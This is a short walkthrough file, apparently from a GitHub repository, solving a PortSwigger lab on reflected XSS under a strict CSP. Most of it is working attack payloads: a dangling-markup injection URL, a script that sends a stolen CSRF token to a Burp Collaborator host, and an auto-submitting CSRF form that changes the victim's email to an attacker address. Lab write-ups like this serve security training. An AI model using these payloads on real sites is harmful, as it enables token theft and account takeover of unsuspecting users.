-
Notifications
You must be signed in to change notification settings - Fork 2
/
Reflected XSS protected by very strict CSP, with dangling markup attack.txt
38 lines (32 loc) · 1.88 KB
/
Reflected XSS protected by very strict CSP, with dangling markup attack.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Reflected XSS protected by very strict CSP, with dangling markup attack
Once again, the solution provided is very good. If you can't find the CSRF token in Collaborator, just do a ctr-f in the request:
GET /?%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20required%20type%3D%22hidden%22%20name%3D%22csrf%22%20value%3D%220d4dWjQjmBuNtrfnEPb2xgyFds9LxBiA%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cbutton%20class%3D HTTP/1.1
Host: pwpqqus57ws79u2n0vf85pnxqowek3.burpcollaborator.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://acb41f431ea774c3803515540145003e.web-security-academy.net/exploit
Accept-Encoding: gzip, deflate, br
First payload to get the CSRF token:
<script>
if(window.name) {
new Image().src='//pwpqqus57ws79u2n0vf85pnxqowek3.burpcollaborator.net?'+encodeURIComponent(window.name);
} else {
location = 'https://ac861ff21ea3743480121594001100f7.web-security-academy.net/email?email=%22%3E%3Ca%20href=%22https://acb41f431ea774c3803515540145003e.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>
Second payload to solve the lab:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac861ff21ea3743480121594001100f7.web-security-academy.net/email/change-email" method="POST">
<input type="hidden" name="email" value="hacker@evil-user.net" />
<input type="hidden" name="csrf" value="0d4dWjQjmBuNtrfnEPb2xgyFds9LxBiA" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>